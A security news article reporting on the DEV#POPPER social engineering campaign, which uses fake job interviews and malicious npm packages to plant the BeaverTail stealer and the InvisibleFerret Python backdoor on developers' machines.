A recent social engineering campaign is targeting software developers with bogus npm packages disguised as job interviews, aiming to trick them into downloading a Python backdoor.
Security researchers from Securonix have identified the campaign as “DEV#POPPER” and have linked it to North Korean threat actors. The developers are lured into downloading and running software from seemingly legitimate sources, such as GitHub, during these fake job interviews. However, the software contains a malicious Node JS payload that compromises the developer’s system once executed.
This activity first came to light in late November 2023 when Palo Alto Networks Unit 42 revealed a cluster of malicious activities known as Contagious Interview, where threat actors posed as employers to distribute malware to software developers. Subsequently, in February, Phylum uncovered malicious packages on the npm registry delivering similar malware families to steal sensitive information from compromised systems.
The attack chain typically starts with a ZIP archive hosted on GitHub, sent to the target as part of the interview process. Within the archive, there is an innocent looking npm module housing a malicious JavaScript file (BeaverTail) that serves as an information stealer and loader for a Python backdoor called InvisibleFerret, retrieved from a remote server.
The Python backdoor is capable of carrying out various malicious activities like command execution, file enumeration, exfiltration, clipboard and keystroke logging. This development highlights the evolving techniques of North Korean threat actors to conceal their actions, blend into networks, and extract data for financial gain.
Researchers at Securonix emphasize the importance of maintaining a security-focused mindset during situations like job interviews, especially when being targeted through social engineering attacks. They warn that attackers behind the DEV#POPPER campaign exploit the vulnerabilities of distracted and vulnerable individuals during such intense situations.
The continuous evolution of cyber attack strategies by North Korean threat actors underscores the need for vigilance and caution among software developers and individuals targeted by such social engineering campaigns.
